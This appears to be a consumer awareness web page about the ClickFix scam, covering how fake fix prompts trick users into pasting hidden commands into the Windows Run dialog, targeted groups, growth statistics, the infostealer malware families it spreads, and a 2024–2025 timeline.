What is ClickFix?

ClickFix is a scam that tricks people into running malicious software on their own computers. It works by making you think your browser or computer has a problem that needs fixing.

How is it different from other scams?

Most computer scams try to get you to download a file. Your browser usually warns you about suspicious downloads. ClickFix is sneakier—it gets around these warnings by making you run the malicious code yourself using your computer's built-in tools.

The key trick:

Instead of downloading a file, ClickFix tells you to:

Press Windows + R (opens a system command window)
Press Ctrl + V (pastes a hidden command)
Press Enter (runs the malicious code)

Because you're the one pressing the keys, your computer's security software doesn't stop it.

Who gets targeted?

Anyone can encounter ClickFix, but attackers have specifically targeted:

Healthcare workers - Through compromised medical resource websites
Hotel staff - Via fake Booking.com emails
Office workers - Through fake Google Meet or Microsoft Teams links
Online shoppers - On compromised e-commerce sites

How big is the problem?

517%

Increase in ClickFix attacks in early 2025 (ESET)

400%

Growth in malicious ClickFix URLs from 2024 to 2025 (Proofpoint)

Most common attack method after phishing (ESET, 2025)

What happens if you fall for it?

The malicious code typically installs "infostealer" software that:

Steals all your saved passwords from your browser
Takes your login cookies (so attackers can access your accounts)
Searches for cryptocurrency wallet files
Captures screenshots of your screen
Sometimes installs ransomware or remote access tools

Common Malware Families

These are the actual malware programs distributed through ClickFix attacks:

Lumma Stealer (LummaC2) - The most common. Steals passwords, cookies, and cryptocurrency wallets.
Vidar Stealer - Similar to Lumma, focuses on browser data and crypto.
DarkGate - A "Remote Access Trojan" that gives attackers full control of your computer.
AsyncRAT / DCRAT - Tools that let attackers spy on you and control your PC remotely.

Timeline: How ClickFix Evolved

Early 2024

First Detection

Security researchers first identify the ClickFix technique being used in the wild.

May 2024

Microsoft Warning

Microsoft Threat Intelligence warns of Storm-1607 campaigns targeting tens of thousands of organizations.

Aug 2024

Organized Crime Involvement

Cybercrime groups Slavic Nation Empire and Scamquerteo begin using ClickFix for cryptocurrency scams.

Late 2024

DIY Kits Available

"ClickFix builders" start being sold on hacker forums, making the attack accessible to less-skilled criminals.

Early 2025

Massive Surge

Attacks increase by over 500%, becoming the second most common attack method globally.

Want to learn more?

See exactly how the attack works, step by step, with real examples.

See How It Works